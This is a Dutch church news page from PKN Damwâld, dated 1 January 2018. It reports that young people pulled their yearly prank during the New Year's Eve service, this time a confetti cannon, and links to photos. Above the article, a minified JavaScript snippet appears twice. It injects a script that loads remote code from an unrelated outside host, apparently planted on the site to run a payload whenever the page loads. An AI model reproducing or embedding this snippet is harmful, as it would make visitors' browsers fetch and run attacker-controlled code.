;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jongeren halen dwaasheid uit tijdens oudejaarsdienst in de Ontmoeting - PKN Damwâld

Jongeren halen dwaasheid uit tijdens oudejaarsdienst in de Ontmoeting

Gepubliceerd op: maandag 1 januari 2018

Tijdens de oudejaarsdienst is een traditie ontstaan dat jongeren een grap uithalen tijdens de dienst. Natuurlijk worden grappen zo veel mogelijk voorkomen en stond dit jaar de koster zelfs op de wacht om te voorkomen dat mensen tijdens de dienst binnen konden komen, echter zonder resultaat. Waar vorig jaar het orgel nog “in de brand” stond en deze door “de brandweer” werd geblust was het dit jaar vooral de bedoeling om er een vrolijke boel van te maken.

Een heus confetti kanon zorgde voor vrolijk podium aan het einde van de dienst. Het wegteam heeft exclusieve beelden van de “dwaasheid” in handen gekregen! Bekijk ze en geniet mee!